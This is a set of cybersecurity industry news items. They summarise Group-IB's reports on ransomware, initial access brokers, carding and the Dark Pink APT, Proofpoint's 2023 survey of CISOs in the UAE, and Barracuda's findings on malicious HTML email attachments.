Ransomware, Initial Access Brokers, Carding – Group-IB Presents Report on Trending Crimes
Group-IB has presented its research into global cyber threats in the report Hi-Tech Crime Trends 2021/2022 at its annual threat hunting and intelligence conference, CyberCrimeCon’21. In the report, which explores cybercrime developments in H2 2020–H1 2021, Group-IB researchers analyze the increasing complexity of the global threat landscape and highlight the ever-growing role of alliances between threat actors. The trend manifests itself in partnerships between ransomware operators and initial access brokers under the Ransomware-as-a-Service model. Scammers also band together in clans to automate and streamline fraudulent operations. Conversely, individual cybercrimes such as carding are in decline for the first time in a while.
For the 10th consecutive year, the Hi-Tech Crime Trends report analyzes the various aspects of the cybercriminal industry’s operations, examines attacks, and provides forecasts for the threat landscape for various sectors. For the first time, the report was divided into five major volumes, all with a different focus: ransomware, the sale of access to corporate networks, cyber warfare, threats to the financial sector, and phishing and scams. The forecasts and recommendations outlined in Hi-Tech Crime Trends 2020-2021 seek to prevent damage and downtime for companies worldwide.
Unwanted guests: over 1,000 accesses to corporate networks were offered for sale in the darknet
One of the underlying trends in the cybercrime arena is a sharp increase in the number of offers to sell access to compromised corporate networks. The market of corporate initial access grew by almost 16% in H2 2020–H1 2021, from $6,189,388 to $7,165,387. The number of offers to sell access to companies almost tripled over the review period: from 362 to 1,099. This exclusive data was obtained by Group-IB’s Threat Intelligence & Attribution system, which gathers even deleted information from cybercriminal underground forums.
This segment of the cybercriminal underground has a relatively low entry barrier. Poor corporate cyber risk management combined with the fact that tools for conducting attacks against corporate networks are widely available both contributed to a record-breaking rise in the number of initial access brokers. In H2 2019–H1 2020, the Group-IB Threat Intelligence team detected only 86 active brokers. In H2 2020–H1 2021, however, this number skyrocketed to 262, with 229 new players joining the roster.
Most companies affected belonged to manufacturing (9% of all companies), education (9%), financial services (9%), healthcare (7%), and commerce (7%). In the review period, the number of industries exploited by initial access brokers surged from 20 to 35, which indicates that cybercriminals are becoming aware of the variety of potential victims.
The geography of initial access brokers’ operations has also expanded. In H2 2020–H1 2021, the number of countries where cybercriminals broke into corporate networks increased from 42 to 68. US-based companies are the most popular among sellers of access to compromised networks — they account for 30% of all victim companies in H2 2020–H1 2021, followed by France (5%), and the UK (4%).
In the Middle East alone, the total cost of all the accesses to the region’s companies available in the underground rose by 37% in the review period and totaled $247,836. Most of the accesses on the sale belonged to organizations from the United Arab Emirates (24%), which was followed by Israel (13%) and Turkey (13%), and Saudi Arabia (12%), and Iran (12%).
One of the main driving forces for initial access market growth is the steep increase in the number of ransomware attacks. Initial access brokers remove the need for ransomware operators to break into corporate networks on their own.
Lock, Lock Who’s There? Corporansom
The unholy alliance of initial access brokers and ransomware operators as part of Ransomware-as-as-a-Service (RaaS) affiliate programs has led to the rise of the ransomware empire. In total, data relating to 2,371 companies were released on DLSs (Data Leak Sites) over H2 2020–H1 2021. This is an increase of an unprecedented 935% compared to the previous review period when data relating to 229 victims was made public.
Thanks to the Threat Intelligence & Attribution system, Group-IB researchers were able to trace how the ransomware empire has evolved since it appeared. Group-IB’s team analyzed private Ransomware affiliate programs, DLSs where they post exfiltrated data belonging to victims who refused to pay the ransom, and the most aggressive ransomware strains.
Over the review period, Group-IB analysts identified 21 new Ransomware-as-a-Service (RaaS) affiliate programs, which is a 19% increase compared to the previous period. During the review period, the cybercriminals mastered the use of DLSs, which are used as an additional source of pressure on their victims to make them pay the ransom by threatening to leak their data. In practice, however, victims can still find their data on the DLS even if the ransom is paid. The number of new DLSs more than doubled during the review period and reached 28, compared to 13 in H2 2019–H1 2020.
It is noteworthy that in the first three quarters of this year, ransomware operators released 47-percent more data on the attacked companies than in the entire 2020. Taking into account that cybercriminals release the data on only about 10 percent of their victims, the actual number of ransomware attack victims is dozens more. The number of companies that opt for paying the ransom is estimated at 30%.
Having analyzed ransomware DLS in 2021, Group-IB analysts concluded that Conti became the most aggressive ransomware group, which made public information about 361 victims (16.5% of all victim companies whose data was released on DLS), followed by Lockbit (251), Avaddon (164), REvil (155), and Pysa (118). Last year’s Top 5 was as follows: Maze (259), Egregor (204), Conti (173), REvil (141), and Pysa (123).
Country-wise, most companies whose data was posted on DLSs by ransomware operators in 2021 were based in the United States (968), Canada (110), and France (103), while most organizations affected belonged to the manufacturing (9.6%), real estate (9.5%), and transportation industries (8.2%).
In the Middle Eastern region at least 50 organizations fell prey to ransomware attacks so far in 2021. To compare, in 2020, the data on 27 companies in the Middle Easter region was released on DLS, which is an increase of 85%. In the current year, the majority of publicly known ransomware attack victims in the Middle East originated from Turkey (20%), the United Arab Emirates (18%), Saudi Arabia (18%), Israel (10%), and Iran (6%).
Another cohort of cybercriminals actively forging partnerships over the review period were scammers. In recent years, phishing and scam affiliate programs have become highly popular. The research conducted by Group-IB revealed that there are more than 70 phishing and scam affiliate programs. Participants aim to steal money as well as personal and payment data. In the reporting period, the threat actors who took part in such schemes pocketed at least $10 million in total. The average amount stolen by a scam affiliate program member is estimated at $83.
Affiliate programs involve large numbers of participants, have a strict hierarchy, and use complex technical infrastructures to automate fraudulent activities. Phishing and scam affiliate programs actively use Telegram bots that provide participants with ready-to-use scam and phishing pages. This helps scale phishing campaigns and tailor them to banks, popular email services, and other organizations.
Phishing and scam affiliate programs, initially focused on Russia and other CIS countries, recently started their online migration to Europe, America, Asia, and the Middle East. This is exemplified by Classiscam: an automated scam-as-a-service designed to steal money and payment data. Group-IB is aware of at least 71 brands from 36 countries impersonated by affiliate program members. Phishing and scam websites create by affiliate program members most often mimic marketplaces (69.5%), delivery services (17.2%), and carpooling services (12.8%).
Carding: The Joker’s Last Laugh
Over the review period, the carding market dropped by 26%, from $1.9 billion to $1.4 billion compared to the previous period. The decrease can be explained by the lower number of dumps (data stored on the magnetic stripe on bank cards) offered for sale: the number of offers shrank by 17%, from 70 million records to 58 million, due to the infamous card shop Joker’s Stash shutting down. Meanwhile, the average price of a bank card dump fell from $21.88 to $13.84, while the maximum price surged from $500 to $750.
An opposite trend was recorded on the market for the sale of bank card text data (bank card numbers, expiration dates, names of owners, addresses, CVVs): their number soared by 36%, from 28 million records to 38 million, which amongst others can be explained by the higher number of phishing web resources mimicking famous brands during the pandemic. The average price for text data climbed from $12.78 to $15.2, while the maximum price skyrocketed 7-fold: from $150 to an unprecedented $1,000.
The Middle East stuck to the global trend and showed the carding market drop of 49% in the review period: it decreased from $47.6 million in H2 2019 – H1 2020 to $24.4 million in H2 2020 – H1 2021. The total number of bank cards belonging to the bank customers in the Middle East offered for sale over the examined period totaled 1,546,842, which is a 34-percent decline compared to the previous review period, when 2,353,854 bank card records were offered.
This was accompanied by the increase in the average price of text card data from $8.95 to $14.09 and a dramatic drop in the price of a dump from $69.82 to $22.91.
A Total of 13 Organizations in 9 Countries Fall Victim to “Dark Pink”
Group-IB has today published a new update into the APT (advanced persistent threat) group codenamed Dark Pink, revealing that a total of 13 organizations in 9 countries have now fallen victim to this malicious actor. Dark Pink’s operations were detailed in depth by Group-IB’s Threat Intelligence unit in a January 2023 blog post, and at this time, researchers linked the group to attacks on 7 organizations in the Asia-Pacific region and 1 in Europe. Group-IB experts have since discovered 5 new Dark Pink victims, and the geographic scope of the group’s operations is wider than previously thought, as organizations in Brunei, Thailand, and Belgium were all hit by Dark Pink attacks.
Continued analysis has revealed that this group is still active, as Dark Pink attacked a government ministry in Brunei this past January and a government agency in Indonesia as recently as April 2023. Additionally, Group-IB researchers were able to attribute three other attacks from 2022 to this particular APT group. The initial access vector for Dark Pink attacks continues to be spear-phishing emails, and Group-IB researchers noted in their January 2023 blog that the group utilized an almost-entirely custom toolkit to exfiltrate files and messenger data from infected devices and networks.
Since then, Group-IB experts can reveal that Dark Pink APT has updated many of these custom tools, changing their functionalities in order to allow the group to slip undetected past defense mechanisms of cybersecurity systems. For example, the group’s custom KamiKakaBot module, designed to read and execute commands from the threat actors via Telegram, is still stored on the filesystem of infected devices, but it is now divided into two distinct parts — one that controls the device and the other that steals sensitive data. Dark Pink also continues to use an MSBuild utility to launch KamiKakaBot in the infection chain.
Group-IB’s Threat Intelligence unit has discovered Dark Pink’s new account on GitHub, which was created as soon as the first information about the APT group was published in the public domain this past January. The threat actors can issue commands to infected machines to download files from this GitHub account, and Group-IB researchers found 12 commits to the new account performed between January 9 and April 11, 2023.
Recent attacks have also seen the group exfiltrate stolen data over a HTTP protocol using Webhook service, and they have also leveraged functionalities of an MS Excel add-in to ensure the persistence of TelePowerBot (a simpler version of KamiKakaBot written in PowerShell). In line with Group-IB’s zero-tolerance policy to cybercrime, all confirmed and potential victims of Dark Pink attacks were issued with proactive warnings.
“Dark Pink APT shows no sign of slowing down,” Andrey Polovinkin, Malware Analyst at Group-IB, said. “APT groups are renowned for their responsiveness and ability to adapt their custom tools to continually avoid detection, and Dark Pink is no exception. The profile of the affected targets underscores the significant danger that Dark Pink poses for both public- and private-sector actors. Group-IB will continue to analyze all Dark Pink activity and ensure that confirmed and potential victims are informed.”
CISOs in the Middle East Have Dealt With Loss of Sensitive Data in the Past 12 Months, Says Proofpoint
Proofpoint, Inc., a leading cybersecurity and compliance company, today released its annual Voice of the CISO report, which explores key challenges, expectations, and priorities of chief information security officers (CISOs). The findings reveal that most CISOs have returned to the elevated concerns they experienced early in the pandemic. Seventy-five percent of CISOs in the UAE surveyed feel at risk of a material cyber attack, compared to 44% the year before, when they may have felt a brief sense of calm after adapting to the chaos of the pandemic.
This year’s data is a shift back to 2021 when 68% of CISOs in the UAE believed a material attack was imminent. Likewise, sentiments about preparedness levels have reversed: 57% feel unprepared to cope with a targeted cyber attack, showing a moderate increase over last year’s 47% and a decrease from 2021’s 72%.
While organizations have largely overcome the disruptions of the last two years, the effects of the Great Resignation and employee turnover continue to linger, exacerbated by the recent wave of mass layoffs—75% of CISOs in the UAE say that employees leaving the organization played a role in a data loss event. Even though 47% of security leaders had to deal with the loss of sensitive information in the past 12 months, only 61% believe they have adequate data protection in place.
The 2023 Voice of the CISO report examines global third-party survey responses from more than 1,600 CISOs at mid-to-large size organizations across different industries. Throughout the course of Q1 2023, 100 CISOs were interviewed in each market across 16 countries: UAE, KSA, the U.S., Canada, the UK, France, Germany, Italy, Spain, Sweden, the Netherlands, Australia, Japan, Singapore, South Korea, and Brazil.
The report discusses global trends and regional differences around three central themes: the threats and risks CISOs face daily; the impact of employees on organizations’ cyber preparedness; and the defenses CISOs are building, especially as the economic downturn puts pressure on security budgets. The survey also measures the changes in alignment between security leaders and their boards of directors, exploring how their relationship impacts security priorities.
“Years of sustained remote and hybrid working has resulted in an increased risk around insider threat incidents, with our research revealing that three-quarters of CISOs in the UAE agree that people leaving the organization contribute to data loss,” said Emile Abou Saleh, Regional Director, Middle East, and Africa at Proofpoint. “The rising challenges of protecting people and data, high expectations, burnout, and uncertainty about personal liability are testing CISOs in the UAE. The way forward is to implement layered defenses, including a dedicated insider threat management solution and strong security awareness training, so organizations are well protected against threats that focus on people as the main perimeter.”
Proofpoint’s Voice of the CISO report for 2023 includes the following findings about the UAE:
- CISOs in the UAE have returned to the elevated concerns they experienced early in the pandemic, while also feeling more unprepared than last year: 75% of CISOs in the UAE feel at risk of experiencing a material cyber attack in the next 12 months, compared to 44% last year and 68% in 2021. Further, 57% believe their organization is unprepared to cope with a targeted cyber attack, compared to 47% last year and 72% in 2021.
- The loss of sensitive data is exacerbated by employee turnover: 47% of security leaders in the UAE reported having to deal with a material loss of sensitive data in the past 12 months, and of those, 75% agreed that employees leaving the organization contributed to the loss. Despite those losses, 61% of CISOs in the UAE believe they have adequate controls to protect their data.
- Email fraud tops the list of the most significant threats: The top threats perceived by CISOs in the UAE are almost the same as last year. In both years email fraud (business email compromise) and cloud account compromise led the way, but this year they were followed by malware and smishing/vishing, whereas last year malware was joined by insider threats as the other top concern.
- Most organizations are likely to pay a ransom if impacted by ransomware: 59% of CISOs in the UAE believe their organization would pay to restore systems and prevent data release if attacked by ransomware in the next 12 months. And they are relying on insurance to shift the risk—56% said they would place a cyber insurance claim to recover losses incurred in various types of attacks.
- Supply chain risk is a recurring priority: 56% of CISOs in the UAE say they have adequate controls in place to mitigate supply chain risk, a modest increase from last year’s 49%. While these protections may feel adequate for now, going forward, CISOs may feel more strapped for resources—65% say their budgets have been impacted.
- People risk grows as a concern: There is an increase in the number of CISOs in the UAE who view human error as their organization’s biggest cyber vulnerability—59% in this year’s survey vs. 50% in 2022 and 70% in 2021. At the same time, 56% of CISOs believe that employees understand their role in protecting the organization, compared to 51% in 2022 and 69% in 2021; this illustrates a struggle to build a strong security culture.
- CISOs and boards are much more in tune: 63% of CISOs in the UAE agree their board members see eye-to-eye with them on cybersecurity issues. This is a substantial increase from the 47% of CISOs who shared this view last year and the same as the 63% who felt this way in 2021.
- Mounting CISO pressures are making the job increasingly unsustainable: 59% of CISOs in the UAE feel they face unreasonable job expectations, a significant increase from last year’s 38%. While the return to their new reality may be one reason behind this view, CISOs’ job-related angst is a likely contributor as well—60% are concerned about personal liability and 59% say they have experienced burnout in the past 12 months.
“Security leaders must remain steadfast in protecting their people and data, a task made increasingly difficult as insiders prove themselves as a significant contributor to sensitive data loss,” said Ryan Kalember, executive vice president of cybersecurity strategy for Proofpoint. “If recent devastating attacks are any indication, CISOs have an even tougher road ahead, especially given the precarious security budgets and new job pressures. Now that they have returned to elevated levels of concern, CISOs must ensure they focus on the right priorities to move their organizations toward cyber resilience.”
HTML Attachments Remain the Most Dangerous File, Says Barracuda
A new Barracuda Threat Spotlight shows how in March 2023 just under half (45.7%) of all HTML attachments scanned by the company were malicious. This follows a steady upward trend in the proportion of malicious HTML files since Barracuda’s last report on the threat in May 2022 when the proportion was less than half (21%) of the current value. In comparison, only 0.03% and 0.009% of the highly popular Microsoft Office and PDF file types were found to be malicious.
HTML stands for Hypertext Markup Language, and it is used to create and structure content that is displayed online. It is also used in email communication – for example in automated newsletters, marketing materials, and more. In many cases, reports are attached to an email in HTML format (with the file extension .html, .htm, or .xhtml, for example). Attackers can successfully leverage HTML as an attack technique in phishing and credential theft or for the delivery of malware.
The data follows analysis by Barracuda researchers of many millions of messages and files scanned by the company’s security technologies. “The security industry has been highlighting the cybercriminal weaponizing HTML for years – and evidence suggests it remains a successful and popular attack tool,” said Fleming Shi, Chief Technology Officer, Barracuda.
Barracuda’s analysis further shows that not only is the overall volume of malicious HTML attachments increasing, nearly a year since the company’s last report, but HTML attachments also remain the file type most likely to be used for malicious purposes. “Getting the right security in place is as important now as it has ever been. This means having effective, AI-powered email protection in place that can evaluate the content and context of an email beyond scanning links and attachments. Other important elements include implementing robust multifactor authentication or – ideally – Zero Trust Access controls; having automated tools to respond to and remediate the impact of any attack; and training people to spot and report suspicious messages,” said Shi.